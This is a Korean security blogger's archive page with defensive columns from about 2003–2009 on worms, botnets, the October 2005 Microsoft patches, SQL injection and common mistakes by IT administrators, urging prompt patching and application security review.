태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'security'에 해당되는 글 105건

  1. 2010.04.27 Security Paradigm의 변화와 현재의 위협
  2. 2010.04.27 MS 신규 패치 - Zero+1 day worm 출현?
  3. 2010.04.27 RPC Worm 관련 문서
  4. 2010.04.27 IT관리자들의 10가지 실수- 두번째
  5. 2010.04.27 IT 보안 현황과 위협에 대한 전망
  6. 2010.04.27 IT 위험에 대비하기 위한 해커 집단의 필요성
  7. 2010.04.27 Defcon CTF 그리고 한국의 보안
  8. 2010.04.27 Cyber Storm - US의 보안 대응
  9. 2010.04.27 CSS Virus PoC 코드 와 구글의 XSS 문제 수정
  10. 2010.04.27 BlackHat의 Web Worm 경고
  11. 2010.04.27 CSI 컨퍼런스 참가 후기
  12. 2010.04.27 해킹시의 기업의 피해에 대한 생각
  13. 2010.04.27 Active X를 이용한 사회공학적 해킹 기법
  14. 2010.04.27 alzip 및 apache 신규 취약성 - 주의
  15. 2010.04.27 해외진출 시의 보안 가이드
  16. 2010.04.27 한국의 보안 10점 만점에 5점!
  17. 2010.04.27 풀어쓴 SQL Injection 공격
  18. 2010.04.27 진정한 넷보안이란?
  19. 2010.04.27 최악의 기업 보안 사례 5
  20. 2010.04.27 테러리스트는 영화대로 하지 않는다.
  21. 2010.04.27 중국으로 부터의 침입 ( 차단과 대응)
  22. 2010.04.27 중국 해커에 대해 그리고 분석.. 2006
  23. 2010.04.27 중국발 해킹 대규모 확산 우려
  24. 2010.04.27 중국 발 해킹대비 홈페이지 보안 워크샵
  25. 2010.04.27 유비쿼터스 환경에 다가오는 위협
  26. 2010.04.27 온라인 한국이 위험하다.
  27. 2010.04.27 안연의 시큐브레인 인수에 대한 사견
  28. 2010.04.27 사이버 보안, 인터넷 그리고 철학
  29. 2010.04.27 브라질 해킹 그룹 분석
  30. 2010.04.27 보안패치 510만대

http://news.naver.com/news/read.php?mode=LSS2D&office_id=092&article_id=0000008198&section_id=105&section_id2=283&menu_id=105

 

보안 기술은 계속 발전 하고 있고 보안을 주 업종으로 삼고 있는 기업들은 공격을 충분히 제어 하고 있다고 말합니다. 모든 솔루션을 도입하면 문제가 해결 되는 것 처럼 이야기 하고 실제로 논의 하고 있으나 현재의 위협은 보다 더 사용자와 기업에게 가까워져 있습니다.

 

솔루션의 도입으로 처리 될 수 있는 문제는 이미 지나간 문제이며 개발 시점에 또 다른 위협요소가 발견이 되고 있고 문제가 되고 있습니다.

Zeroday Attack [ 취약성에 대한 패치가 나오기 이전에 공격 코드가 출현하는 것 ]과 Monster Bot [ 하나의 취약성을 공격하여 수십가지 이상의 공격 도구 및 취약성을 통한 확장을 시도하는 Bot]의 출현은 현재 전 세계의 IT Infra가 직면한 위협입니다.

 

공격 대상이 기업 단위를 넘어 직접적인 사용자 단위에 까지 접근 하고 있어 IT산업을 주된 영역으로 하는 인터넷 비즈니스 기업외에도 일반 기업에게도 직접적인 위협 대상이 되며 보안이 강화되지 않은 기업의 정보들은 일반 사용자들 대다수의 개인정보 및 중요정보를 노출 시키고 문제화 되게 만들고 있습니다.

 

 

솔루션의 도입은 타당합니다. 그러나 정답은 아니라고 할 수 있습니다. 솔루션은 점점 더 늘어만 가는데 하는 일은 줄어 들지 않습니다.
오히려 더욱 많은 부분을 신경 써야 하고 Super Extra에 해당되는 능력을 요구하고 있습니다.  왜 그럴까요?

 

앞서 말씀드린 위협의 실제적인 출현과 비지니스에 직접 영향을 줄 수 있는 범주의 공격은 많은 부분을 고민하게 만들고 기술의 발전은 많은 구성요소에 대한 직접 검토와 검수가 필요한 부분이며 인프라에 대한 위협을 낮추기 위해서는 내.외부의 위협을 검토하고 조정해야 하는 수많은 일들이 지속적으로 증가할 수 밖에 없기 때문에 앞으로도 IT산업이 발전 할 수록 일은 더욱 늘어날 것입니다.

 

빠르게 발전하는 위협에 대한 대응은 같은 속도로 진화해 갈 수 있는 동일한 능력을 보유한 White Group에 의해 이루어 질 수 있습니다. 그러나 모든 회사가 White Hacker 그룹을 보유 할 수는 없습니다. 그리고 개별 회사의 뛰어난 능력을 모든 산업을 위해서 쓸 수도 없습니다.  너무나도 많은 희생이 필요하기 때문이죠. 회사든 개인이든..

 

공격 기술이든 보안 기술이든간에 서로 발전하고 있고 발전의 폭은 공격 기술이 더욱 높습니다. 모든 것을 함께 공유하여  새로운 시도가 이루어 지기 때문인데 보안 기술은 그렇지 못하고 있습니다. 공유의 폭도 좁으며 공유 할 수 있는 정보 자체도 한계가 있습니다.

앞으로도 더욱 큰 차이가 발생 할 수 있을 것으로 판단되며 전문인력을 보유하여 업무 전반적인 부분에 보안 프로세스가 스며 있어서 습관화된  기업과 그렇지 못한 기업의 차이는 단 한번에 극명하게 차이가 날 것입니다.  인력의 보유가 전부가 아닌 업무 프로세스 전반에 걸쳐 보안 관련 부분이 스며 들어 있고 분명하고 명확한 의사결정 및 정책의 지지에 의해 차이는 더욱 극대화 될 것입니다.

 

글로벌 기업일 수록 더욱 더 실감할 수 있는 위협은 이미 너무 가까이에 다가와 있으며 언제든 현실화 될 것입니다.


 

보안 기술은 빠르게 발전 합니다.

그러나 보안기술 보다 더욱 빠르게 발전하는 것은 공격에 관련된 기술입니다.

일명 BotNet 이라 불리는 좀비 PC [ 취약성을 공격하여 권한을 획득한 PC] 를 이용한 거대한 컨트롤 공격의 위험도도 상당히 높은 상태입니다. 보안 기술은 이제 외부의 위험으로 부터 보호하는 정책으로 급격하게 선회 하였으며 해당 정책에 따라 외부의 위험으로 부터 격리 시키는 정책과 기술적인 대책이 가장 중요하게 취급이 되고 있습니다. 일반적인 기업의 경우 외부의 위험으로 부터 격리 시키는 것은 그리 어렵지 않습니다.


그러나 IT 기반의 영역을 주된 사업 기반으로 지니고 있는 기업의 경우 고객과의 접점과 회사의 이익 발생 부분 대다수가 웹 및 인터넷을 이용한 영역이라 외부의 위험으로 부터 격리 시킨다는 것이 가장 어려운 영역의 일이 됩니다.

 

계정과 접근에 대한 일관된 프로세스 및 기술적인 대안이 명확해야 하고 Identity 관리 부분에 있어 직원이나 외부의 고객이 접근 하는 통로에 대해 분명한 가이드와 명확한 정책 , 일관된 방침이 유지가 되어야만 위험요소를 줄일 수 있습니다.

 

공격 기술의 발달과 보안 기술의 발달 측면에서 현재는 소수의 공격자가 대규모의 공격 가능 자원 [ 좀비PC Network - BotNet]을 이용하여 개별적인 대응외에는 종합적인 대응이 어려운 개개의 산업을 위협하고 있는 형국입니다.

보안 분야의 Role을 수행하는 그룹이나 팀에게는 보다 더 편리하고 편리성에 기반한 오픈을 요구하고 있으나 외부의 위협을 분명히 인지하고 있는 팀에게는 위험부담이 크며 또한 관리 포인트가 급격하게 증가하는 위험성이 동시에 존재하고 있습니다.

편리성과  보안성은 예전부터 상극을 이루고 있었으나 기업의 비지니스에 치명적인 영향을 줄 수 있으므로 편리성에 대한 약간의 양보가 지속적으로 요구 되며 보안 강화를 위한 아이덴티티 관리 [ 계정 , 접속 보안 강화 ]에 명확한 이해가 수반 되어야 합니다.

 

기업의 비지니스를 지키기 위한 노력은 앞으로 Infra 측면에서 심대한 노력이 필요할 것으로 판단되며 노력을 하는 기업과 그렇지 못한 기업의 차이는 매우 클 것입니다. 분명해질 시점은 지금 부터 이겠죠.

 

- 바다란 . p4ssion

 

* 아래의 이미지는 Security  관련 패러다임이 어떻게 변경 되었는지를 구분짓는 내용입니다. 격리에서 보호로 선회한 가장 큰 이유는 자동화된 공격 및 자동 전파되는 Worm에 의해서 라는 것이 정답입니다.  그 누가 뭐라해도 이 과정을 모두 지켜보고 직접 대응한 입장에서 현재의 패러다임 변화는 명확합니다. ^^;  - 클릭 하시면 큰 그림으로 ^^
Posted by 바다란

댓글을 달아 주세요

안녕하세요 바다란입니다.

 

최근 MS에서 10월 정기 패치가 발표되었습니다. 그리고 며칠 지나지 않아 취약성을 공격하는 코드들이 출현하고 있습니다. 따라서 긴급껀에 대해서는 빠른 패치가 필요 할 것 같습니다.

 

현재 공격코드가 출현 한 패치는 다음과 같습니다.

05-044 , 05-045 , 05-048  입니다. 이중 CDO 관련된 05-048의 경우 Remote Buffer overflow 입니다.

위의 세 취약성에  대한 PoC ( Proof of concept) 코드가 출현 하였으며 이 의미는 이미 웜 제작 단계에 돌입한 걸로 보입니다.

웜을 만드는 것은 예전과 다르게 아주 손쉽고 자동화 되어 있으며 IRCBot 과 같이 기존에 공격하는 몇 십가지의 취약성에 추가적으로 공격 코드만을 추가 하는 것이므로 매우 쉽습니다. 따라서 복합화된 웜에 대한 위험 레벨이 매우 높습니다.

 

현재 영.미권에서 이번 보안 패치와 관련하여 패치 발표 후 하루도 지나지 않아 위험성 높은 웜으로 발전할 취약성으로 05-051 취약성을 꼽고 있습니다. MSDTC와 관련된 문제로서 MS-SQL을 운용하는 서비스 서버에서는 자동적으로 활성화가 되므로 매우 위험도가 높을 수 있습니다.

 

지난해 부터 지속된 이야기 이지만 최근의 웜은 한 가지 취약성을 공격 하지 않습니다.
대략 20여가지 이상의 최신 취약성을 집중 공격 합니다. 물론 메일 첨부파일 공격은 기본이구요.
이 중에 단 하나의 공격이라도 성공하게 되면 내부에 자신을 복제한 후 IP 대역에 대해서 집중적인 공격을 시행 하게 됩니다. 따라서 한번 침입에 성공하게 되면 내부망에 큰 영향을 미칠 수 있습니다.

 

대응은 PoC 코드가 출현한 패치에 대해서는 긴급 적용이 필요하며 추가적으로 05-051 MS-DTC 관련 Remote 취약성도 긴급으로 처리 하여야 합니다.
이후 서비스 상태에 따라 추가적인 패치가 적용 되어야 할 것 같습니다.

 

공격코드 출현 사이트 입니다.
http://www.frsirt.com/exploits/

 

05-051 관련 소식은 여기입니다.
http://www.zdnet.co.kr/news/internet/virus/0,39031349,39140367,00.htm


**********************************************************************
MS05-044
제목: Windows FTP 클라이언트의 취약점으로 인한 파일 전송 위치 변조 문제점 (905495)

영향을 받는 소프트웨어:
Microsoft Windows XP SP1
Microsoft Windows Server 2003
Microsoft Windows Server 2003 (Itanium 기반 시스템용)

영향을 받는 구성 요소:
Microsoft Windows 2000 SP4의 Internet Explorer 6 SP1

패치 다운로드 ->
http://go.microsoft.com/?linkid=4082650


**********************************************************************
MS05-045
제목: Network Connection Manager의 취약점으로 인한 서비스 거부 문제점 (905414)

영향을 받는 소프트웨어:
Microsoft Windows 2000 SP4
Microsoft Windows XP SP1, SP2
Microsoft Windows Server 2003 RTM, SP1


패치 다운로드 ->
 http://go.microsoft.com/?linkid=4082651

**********************************************************************
MS05-048
제목: Microsoft Collaboration Data Objects의 취약점으로 인한 원격 코드 실행 문제점 (907245)

영향을 받는 소프트웨어:
Microsoft Windows 2000 SP4
Microsoft Windows XP SP1, SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 RTM, SP1
Microsoft Windows Server 2003 (Itanium 기반 시스템) RTM, SP1
Microsoft Windows Server 2003 x64 Edition
Exchange 2000 Server SP3 (2004년 8월에 발표된 Exchange 2000 SP3 이후 업데이트 롤업이 설치된 버전)


패치 다운로드 ->
http://go.microsoft.com/?linkid=4082654

**********************************************************************

MS05-051
제목: MSDTC 및 COM+의 취약점으로 인한 원격 코드 실행 문제점 (902400)

영향을 받는 소프트웨어:
Microsoft Windows 2000 SP4
Microsoft Windows XP SP1, SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 RTM, SP1
Microsoft Windows Server 2003 (Itanium 기반 시스템) RTM, SP1
Microsoft Windows Server 2003 x64 Edition

패치 다운로드 ->
http://go.microsoft.com/?linkid=4082657
**********************************************************************


Let your soul be your pilot!! . p4ssion

 

Posted by 바다란

댓글을 달아 주세요

2003년 8월 작성.

RPC 관련 대형 취약성 출현시에 위험성을 알리고 대책을 권고하기 위해 간단히 만든 문서.

 

Posted by 바다란

댓글을 달아 주세요

10가지 어리석은 실수들-2

 - 바다란, zdnet 보안컬럼니스트

 

전편에는 시스템 및 네트워크 부분에서 빈번하게 발생 되는 케이스들을 살펴 보았다. 10여 년의 기간 동안 일선에서 침해사고를 담당하고 보안구성에 대한 업무를 진행하면서 상당수의 침해사고 발생 이후의 확산에 가장 큰 영향을 끼친 부분으로 보고 있다. 이번 컬럼의 내용은 2005년 이후 현재까지 진행중인 대부분의 침해사고에 해당되는 Application에 관련된 부분이다.

네트워크 관리자가 아닌 IT 관리자라 칭한 이유도 범위를 한정하여 발생 되는 부분이 아니며 전체의 관점에서 바라보아야 할 이슈이다.

 

Application에 관련된 보안 부분은 2000년대 이후 장대하고 중요한 흐름을 보이고 있다. 인터넷의 발달과 생활의 밀접화는 주변의 많은 것들을 변화 시켰고 생활에 밀접한 많은 것들을 인터넷 연결이 가능한 많은 부분들로 변하게 하고 있다.

Web 2.0 이라는 용어 자체도 생활에 밀접한 사용자친화형, 생활형을 가진 인터넷상의 삶과 동일하게 볼 수 있다. Web 2.0의 발달이 의미 하는 것은 사용자와 더 친밀하고 생활에 더 밀접한 요소들이 인터넷과 연결 되어져 있음을 의미한다.

 

Twitter 와 미투데이를 이야기 하고 블로그와 SNS의 생활 밀접도는 활동성이 큰 계층에 대해 상당히 높은 비중을 가지고 있다. 사용자간의 밀접도가 높고 연결관계를 가짐으로 인해 예전과는 비교 할 수 없을 만큼의 파급효과를 가지고 있고 위험도 동일하게 존재한다.

Web 2.0에서 발생될 수 있는 위협들에 대해서는 예전에 정리한 자료가(첨부파일) 여전히 유효하며 참고 할 수 있을 것이다.

 

본 컬럼에서 언급하는 Application Web Application으로 한정하여 논의를 하도록 한다. 넓은 범주의 Application이라 하더라도 인터넷 연결이 가능한 대부분의 Application은 동일한 문제들을 지니고 있는 것은 명백한 사실이며 현실이다.

 

< Major Attack trends by p4ssion>

 

전체적인 공격동향의 변화를 정리하고자 2007년에 작성한 이미지이고 현재도 별반 달라진 내용은 없다. 2005년을 기점으로 하여 국내를 기준으로 보면 자동화된 Application Attack이 최초 출현하고 이후에는 폭발적으로 증가한 상태로 볼 수 있다. 전 세계적으로도 Application Attack 관련 하여서는 2005년 이전에는 전문가에 의한 부분적이고 국지적인 침해들이 있었으나 2005년을 기점으로 하여 Web application을 공격하는 도구가 출현함에 따라 파급력이 매우 커지는 결과를 초래 하였고 현재는 인터넷 환경의 가장 큰 위험으로 등극한 상황이다.

 

수많은 개인정보의 유출과 도용 사례, 대규모의 좀비 PC, 서비스에 대한 직접적인 DDos 공격과 같은 모든 주요 사안들이 Application Attack과 연결되어 있다. 본 컬럼에서 필자는 이점에 대해서 분명히 하고자 한다. 2005년을 기점으로 국내 및 세계의 인터넷 위험도는 급격하게 증가 하였으며 보호를 위한 노력이 느리게 진행됨에 따라 지금까지의 위험보다 더 크고 복잡화된 위험들이 이미 다가와 있음을 분명히 한다.

 

 

기존의 소규모 혹은 국지적으로 이루어지는 해킹사고의 경우 침해사고의 범위와 피해 대상이 제한적 이였다. 그러나 현재의 환경은 개인의 PC를 대상으로 하고 있으며 종래에는 서비스까지도 위협하는 단계에 도달해 있다. 공격자들은 공격 범위와 대상에 대해 제한이 없으며 모든 개인 사용자의 PC를 개별적으로 공격할 필요성도 없다. 공격은 웹서비스가 대신해 준다. 공격자는 다만 주된 지점만을 공격하여 악성코드를 유포 하도록 만 하면 된다.

 

주된 지점에 대한 공격은 SNS, 게시판, 덧글, 동영상 등을 이용한 악성코드 전파들도 있으며 더 근본적인 기저에는 취약한 Web Application에 대한 권한 획득이 가장 근본적인 문제이다. Web Application에 대한 직접적인 공격을 통해 DB에 저장된 데이터를 절취해 가고 Web Application의 소스코드를 변조하여 방문하는 모든 사용자에게 악성코드를 유포하도록 한다.

 

Web Application에 대한 자동화된 공격도구의 출현은 보안에 대한 패러다임을 바꾼 것이 아니라 인터넷 산업 자체의 패러다임을 바꾼 중대한 전환점이라 할 수 있다. 공격 도구의 자동화가 끼친 영향은 DB의 사용자 정보 유출 과 정보 유출이 일차적인 목적 이였으나 불특정 다수에 대한 악성코드 유포의 도구로 활용 됨에 따라 큰 전환점이 일어난다.

 

방문 하는 모든 사용자의 PC에 취약성이 존재하면 반드시 감염이 되고 모든 사용자의 정보는 공격자에게로 전송이 되고 조정이 된다. 수백 만대가 넘는 좀비PC의 확보는 상당 부분 유사한 형태로 이루어 졌을 것이다. 유출된 개인정보들은 DB에 저장된 정보 이외에도 개인 사용자 PC에서 전송되는 정보들도 있다. 엄청난 양의 개인정보들은 이미 유출 되었고 활용이 되고 있다. 그 결과 정확도와 신뢰도가 높은 보이스 피싱과 일반적인 피싱 공격들이 연이어서 발생 하는 것뿐이다. 더불어 권한 획득된 개인 PC를 이용하여 DDos 공격을 하고 개인정보를 이용하여 서비스의 혼돈을 초래하며 거래를 통해 이득을 얻어내고 있다.

 

모든 전문가들이 개인PC의 보안을 강화하라고 한다. 그러나 보다 근본적으로는 모든 IT 서비스에 대해 보안성 검증이 먼저 되어야 할 것이다. 전파가 가능한 매개체를 줄이면 피해는 국지적으로 발생 할 뿐이다. 지금은 그 어떤 것도 되어 있지 않고 개인의 책임만을 이야기 한다. 일면 무책임 하기도 하다. 물론 개인PC에 대한 보안성 강화는 당연히 있어야 하는 일이다.

 

 

일반적으로 우리가 악성코드라고 부르는 것은 백신에서 악성코드라고 탐지를 할 때에야 비로소 알게 된다. 악성행위를 하는 프로그램은 백신개발사에 의해 분석되고 등록되기 이전에는 악성코드라고 탐지가 되지 않는다.

 

만약 새로운 유형의 악성코드가 지금껏 발표되지 않은 비공개된 취약성을 이용하여 개인PC를 공격 한다면 사전에 발견 할 수 있을까? 아직 기술의 진보는 여기에 완전하게 이르지 못했다.  그렇다면 웹 서비스를 통해 새로운 유형의 악성코드가 유포 된다면 감염자는 얼마나 될 수 있을까? 방문 하는 사용자의 상당비율이 감염이 될 것임은 불을 보듯 뻔하다. 지금은 얇디 얇은 유리와 같은 상태로 인터넷 서비스와 산업이 유지되고 있는 상황이다.

 

지금의 현실은 상상하기에도 끔찍한 현실이다. 그러나 이 현실 속에서도 생존 해야만 미래가 있다. 그 생존을 위해서는 문제를 공론화 하고 풀어가는 과정이 필요한데 숨기려고만 한다. 풀어가는 과정 조차 없고 문제의 핵심에 대한 논의도 거의 없는 상태이다.

 

 

기본적인 현실에 대한 간략한 설명을 우선 하였고 각 항목별로 어떻게 연결이 되는지 확인을 해보자. 이제 열 가지 실수 중 남은 부분을 살펴 보면 다음과 같다.

 

Failing to test noncritical applications for basic vulnerabilities

 

중요하지 않은 Application이라는 용어에 몇 가지 의미가 있을 수 있으나 이 부분에서는 외부로부터 http 접근이 허용이 된 모든 Application이라고 보아야 바람직하다. 일반적으로 외부로부터 침입에 활용되는 매개체는 2005년 이전의 직접적인 서비스 공격에서 서비스 포트에서 운영이 되는 Web application으로 옮겨져 있다. 지금의 공격도 여기에 집중이 되고 있다. 항상 외부로부터의 관점에서 취약성을 평가해야만 안정성을 보장 할 수 있다. 일반적으로 각 서비스 회사마다 하나에서 수십, 수백여 개의 서비스 URL들을 운영 하고 있을 것이다. 그러나 대부분의 보안상 위험에 대한 관점은 주된 서비스 몇 개에 한정 되어 있다. 위험에 대한 모니터링과 보안에 대한 강화들도 대부분 주요 서비스에만 집중 되어 있는 상황이다. 특히 Application에 대한 보안성 강화는 많은 노력과 시간들이 소요 됨으로 인해 주요 서비스만 시행을 하는 경우만 많다. 내부망에 침입 할 수 있는 주변 Application에 대한 관리가 소홀하고 취약성 제거가 이루어 지지 않는다면 그 동안의 모든 보안강화 조치는 우회를 통해 완전하게 무력화 된다.

 

우회 할 수 있는 여러 통로들이 있고 어차피 동일한 결과를 가져 오는 상황에서 보안이 강화된 사이트들을 직접 공격할 이유는 전혀 없다. 중점 관리의 영역에서 벗어나 있고 외부에 오픈된 상태로 존재하는 web application의 존재는 전체를 위험하게 만들 수 있다. 우회하여 권한을 획득하고 해당 서버에 백도어를 설치한 이후 주변 서버로 제한 없이 공격을 실행 하고 확대하는 것은 보호되고 있는 서비스망 전체를 무너지게 만든다.

 

결론적으로 서비스를 제공하는 모든 Application에 대해서 외부에서의 오픈 현황을 정기적으로 확인하고 오픈된 서비스에 대해서는 반드시 취약성 존재 유무를 확인하고 제거 하여야만 된다. 본질적으로는 허가를 받지 않은 서비스는 외부에 오픈 되어서는 안 되는 것이 기본이나 예외적 상황은 언제든 발생하게 마련이다.

 

벽은 눈 앞에만 쌓여 있고 한 걸음만 옆으로 비껴가면 벽은 없는 것과 마찬가지 이다. 좀 더 나아가 서비스별로 접근제어도 고민 하여야 하고 내부망에서의 위험 인지를 위한 방안들도 고민 하여야 사고가 발생 하더라도 피해의 최소화가 가능하다.

 

보안은 침입을 막는 것도 중요하나 더 중요한 부분은 침입에 대한 피해를 최소화 하고 분석과 재발방지를 위한 대안 제시가 가능한지가 핵심이다. 전문가의 역할이기도 하다.

 

 

 

Not adequately protecting your servers from malware.

 

Malware라는 개념은 악성코드라는 개념으로 볼 수 있고 일반적인 백도어와 키로거등을 총칭한다.현재의 항목에서 논의되는 사항은 바로 위의 항목 부분에서 언급한 내용과 동일하다. 대부분의 서비스 관리자는 바깥으로부터의 침입에만 여력을 기울이는 경향이 매우 크다. 그러나 항상 모든 Application은 취약점이 있다는 자세로 그 다음 단계를 준비하는 것이 반드시 필요하다. 대부분의 공격자들은 침입 이후에는 계정정보를 획득 하거나 백도어를 설치 할 때 알려진 도구를 일반적으로 사용 한다. 이 경우를 탐지 할 수 있는 도구가 필요하며 일반적인 백신 제품의 설치가 필요하다. 서버군이 많을 경우에는 중앙통제가 가능한 형태의 백신 제품을 사용 하여야 관리와 통제가 용이하다. 최소한 알려지지 않은 도구를 사용하더라도 발견 즉시 전체의 서버군에 적용 할 수 있어야 한다. 그래야 피해를 확실히 알고 종합적인 대책이 가능하다.

 

우회 침입 이후의 공격자의 행동을 탐지하고 제약하기 위한 도구들의 운영미비는 항상 존재한다. 또한 공격자들은 침입 이후 (침입자체를 백신제품이 완전히 탐지 하지는 못한다.) 백신 제품이 활성화 되어 있을 경우 백신 제품을 비활성화 시키고 의도한 바를 하고자 한다. 만약 중앙통제 및 관리가 되지 않는 제품이라면 놓칠 수 밖에 없는 부분이다.

 

 

Not knowing where credit card or other critical customer data is stored.

 

서구권역의 경우 중요한 개인정보는 거래 및 카드 관련된 내용, 사회보장번호등이 가장 중요한 내용으로 취급된다. 국내의 경우에는 개인의 신상에 관련된 정보들이 휠씬 더 중요한 의미를 가지고 있다. 카드 도용 사고는 서구권역에서 비일비재하게 발생 되는 이슈이고 사고 발생 이후의 추적을 통해서 문제들을 제거하는 경우가 일반적이다. 국내의 경우는 금융 관련된 거래에는 여러 다양한 제약 조건들이 있어서 공격자가 데이터를 가져간다 하여도 어려움이 존재한다.  장단점이 있지만 국내의 경우는 개인정보가 고유한 Identity를 나타냄으로 인해 여러 유형의 피싱에 이용 될 수 있고 보다 더 복잡한 문제들을 일으키게 된다. 따라서 Data의 보호는 최우선 순위이고 대부분의 IT관리자들이 이점을 잘 알고 있다.

 

Data의 관점은 보호 관점에서 분류가 달라 질 수 있다. 개발소스가 될 수도 있고 고객정보가 될 수도 있다.

 

최 우선순위에 해당하는 보호 대책이 적용 되고 있는 중요 데이터 저장 서버 이외에도 백업된 데이터 및 개발자나 관리자의 PC에 남겨진 데이터들에 대한 관리들도 제대로 되고 있는지 살펴 볼 필요는 있다. 개발자나 관리자 이외에도 고객상담과 관련된 분야에 있어서도 고객 관련된 데이터를 취급함으로써 문제 발생 소지는 높다.

 

공격자는 강화된 수준의 중요 데이터 저장 서버를 직접 공격하기 보다는 우회하여 주변의 백업 혹은 개발자, 관리자, 고객상담 관련 부분에 대한 우회 공격을 통해 손쉽게 정보를 빼내어 갈 수 있다.

 

정책적이고 기술적인 측면에서 중요 Data에 대한 접근과 관리 및 보관에 대해서는 엄격한 적용이 필요하고 보호대책도 준수 되어야 함을 알 수 있다.

 

 

 

Failing to find SQL coding errors. ( or Application vulnerability)

 

 

Application의 취약성을 찾는 것은 항상 어렵다. 특히 C/S Application이 아닌 변화와 갱신이 많은 Web Application에 대해 보안성을 항상 최상으로 유지하는 것은 상당히 어려운 수준의 업무임은 틀림 없다.

 

SQL Injection 공격은 현재 직접적인 Web server 침입과 Data의 절취에 직접 사용이 되고 있는 공격 기법이고 자동화된 도구가 대량으로 출현한 상태라 Web Application의 안정성은 높은 수준으로 위협을 받고 있다. 문제 해결을 위해서는 장비 도입을 통해 임시적으로 막는 방법들이 있고 또 한가지는 근본적인 소스코드의 문제점을 수정하는 방법이 있다. 웹 보안 장비의 도입을 통해 막는 방법은 우회할 수 있는 여러 기법들과 새로운 공격 기법의 출현에 따라 무력화 되면 새로운 공격 기법이나 우회 기법이 나올 때 마다 업데이트를 진행 해 주어야만 하는 점이 있다.

 

특징을 가진 웹 사이트의 경우에는 각 사이트마다 특징에 맞는 구성을 해주어야 하는 점도 있어서 공격 유형의 변화에 빠른 대응을 하기란 어려운 점들이 있다. 근본적인 문제 해결을 위해서는  전문인력을 통해 보안성을 점검하거나 스캐너, 소스코드 리뷰 등을 통해서 소스코드에 존재하는 문제점을 찾아 내고 수정 할 수 있도록 가이드 하여야 한다.

 

보안장비의 경우에는 변화되는 공격에 무력하다는 점과 특징이 있는 경우에는 Customizing이 대량으로 필요하다는 점에서 어려움이 존재한다. 그러나 당장의 소스코드 개선 여력이 없는 곳에서는 알려진 위험을 막기 위해서라도 도입 하는 것은 바람직하다. 근본적인 개선은 아니며 향후 문제 발생 소지가 계속 존재한다는 점은 절대 잊지 말아야 한다.

 

전문인력을 통해 진단을 하고 소스코드를 리뷰 하는 행위의 문제점은 웹 서비스 개발보다도 리소스 비용 및 시간 소요가 더 오래 걸리는 경우가 많다는 점이 문제다. 치명적인 문제점이라 할 수 있다. 또한 템플릿 을 기반으로 하여 Secure programming을 진행하는 경우 웹 개발자에게 획일화된 프로그래밍을 하도록 제약 함으로써 창의성을 해치는 결과를 가져 오기도 한다.

 

두 방안 모두 장단점이 있으나 여력이 있는 서비스 업체와 그렇지 않은 업체 사이에 선택은 다를 수 밖에 없을 것이다. 현재의 인터넷 환경은 가난하고 여력이 없는 서비스에 대해서는 무지막지할 정도로 가혹한 환경이다.  이 부분에 대해서는 근 시일 내에 컬럼으로 효율적인 대응 방안을 정리 할 수 있도록 하겠다.

 

 

Not following the Payment Card Industry Data Security standards.

 

위의 항목은 국내의 현실과는 약간 다른 항목이다. 국내에서 통용되는 부분으로 논의하자면 좁은 범주의 정보보호관리체계인증(ISMS), 정보보호안전진단, ISO 27001 (이전의 BS7799)등에 존재하는 Data 보호 규정을 준수 하여 Data를 보호해야 한다는 것을 의미한다. Data의 보호를 위한 규약들은 기본적인 규칙의 준수를 의미한다. 기밀성이 필요한 데이터에 대한 암호화, 외부로부터의 접근제한, 접근자에 대한 통제, 기본적인 서비스 보안구성, 암호화된 데이터의 전송 등은 필수적으로 고려해야 할 대상이다. 상세한 설명은 곳에서 찾을 수 있다.

 

 

이상과 같이 전편에 이어 이번 편에 이르기까지 10가지의 실수들에 대한 언급을 통해 자주 발생 되는 침해사고에 대한 내용들과 연관된 부분들을 살펴 보았다. 물론 개인적인 경험들이 들어간 내용이라 정확한 방향이라고 언급하기에는 어려운 부분이 있다. 여러 해 동안을 일선에서 살펴보고 대응을 하는 과정에서 일관되게 발견 되는 문제점으로서 언급을 하였다는 정도로 인식을 해주시면 바람직할 것이다.

 

현재의 인터넷은 침해사고에 대한 언급을 하기 이전에 상당히 위험한 상황에 처해 있으며 앞으로 상당 수준의 노력을 기울여야만이 일정 수준의 성과를 보장 할 수 있는 상태이다. 위험성은 은폐한다고 해서 사라지지 않는다. 은폐든 무지든 마찬가지의 결과다. 더 큰 결과로 산업을 위협하게 될 것이다. 이제는 직접적인 위협이 됨을 이미 여러 번 목격을 하였지만 아직 큰 방향성도 없다.

 

사막의 여행자는 눈 앞의 끝없는 사막이 아니라 밤하늘의 별을 볼 수 있어야만 생존 할 수 있다고 한다.  지금 우리는 어디쯤인지도 모르는 것은 아닐까?

 

 

인터넷과 IT의 활성화를 시작한 김대중 전 대통령의 서거를 진심으로 애도합니다.

유난히 큰 분들이 많이 가십니다. 어쩌면 인간의 탐욕에 대한 재앙이 아닐까 생각 되어 씁쓸합니다.

Posted by 바다란

댓글을 달아 주세요

 

 

 

2005년 현재의 취약성 및 위협 동향 과 향후의 위협 과 대응

 

 

최근 동향을 보면 다음과 같이 요약이 가능합니다.

 

* 클라이언트 단위의 위험 증가 ( 개인 PC 에 대한 중점적인 공격 )

해외에서는 피싱등을 이용한 공격이 증가하고 있고 국내에는 직접적인 클라이언트 PC 공격 및 취약성을 이용한 악성코드 설치가 주된 유형입니다.

 

* 일반 Application에 대한 공격 증가
( 버그트랙이나 기타 메일링을 보아도 운영체제 등에 대한 취약성 보다는 운영체제 기반하에서 영리 목적이나 운영을 목적으로 코딩된 솔루션에 대한 취약성이 집중되고 있습니다.)

http://www.securitymap.net/sdm/docs/attack/Application-Attack-Analysis-PHP.pdf

 

 

* 보다 더 집중화된 Bot의 공격 

( 일전에 Bot 관련된 언급을 하면서 Monster Bot 이라는 용어를 언급한 적이 있습니다. 취약성이 나올때 마다 공격 기능이 하나씩 더 추가가 되어 하나의 Bot이 공격하는 공격의 가지수가 지속적으로 늘어나는 유형이죠. 또한 운영체제의 구분 없이 Application 에 대한 공격 유형도 첨가 되는 형태라 가히 Monster bot으로의 지속적인 진화가 예상 됩니다. )

 

* Application Worm의 일반화 가능성 매우 증대

( 특정 국가 , 특정 지역 , 특정 회사에 기반하여 사용되고 있는 Application 자체의 취약성을 통해 전파되고 통신망을 무력화 하는 공격이 매우 증가할 것으로 판단 됩니다. 무선 관련이나 블루투스 관련된 웜의 전파도 동일 유형이라고 보시면 됩니다.)

